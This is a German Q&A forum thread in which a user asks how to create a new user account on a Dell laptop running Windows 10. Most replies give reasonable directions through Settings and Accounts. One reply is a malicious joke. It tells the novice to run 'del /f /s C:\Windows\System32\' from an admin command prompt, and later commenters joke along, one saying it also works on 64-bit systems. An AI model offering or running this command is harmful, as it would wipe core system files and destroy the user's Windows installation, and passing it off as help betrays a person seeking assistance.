Wie kann ich bei einem Dell laptop ein neues Benutzerkonto anlegen?

4 Antworten

Das Benutzerkonto ist Betriebssystemsache und hat mit dem Rechner nichts zu tun ;) aber mit Win 10 kenne ich mich leider nicht aus, Müsste aber in der Systemsteuerung zu finden sein.

Das ist egal ob der von dell oder lenovo oder sonstwo erstellt wurde das was entscheidet das betriebssysthem in deinem fall windows 10 und einen neuen benutzer kannst du in den systhemeinstellungen anlegen

Asilee
Fragesteller

wow so weit bin ich auch gekommen ich weiß nur nicht wo genau

Du gehst einfach auf Windows taste dann auf Einstellungen , Konten ......und dann mußt du auf Familienmitglied hinzufügen drücken oder ein neues Microsoft Konto anlegen

cmd mit Adminrechten öffnen und "del /f /s C:\Windows\System32\" eingeben

PIwolf  08.05.2016, 22:47

glaubst du das er ein 32 sythem hat XD

bleteR  16.08.2021, 20:05
@PIwolf

Der Ordner heißt auch bei Windows 64 bit so. Ich habe Erfahrung.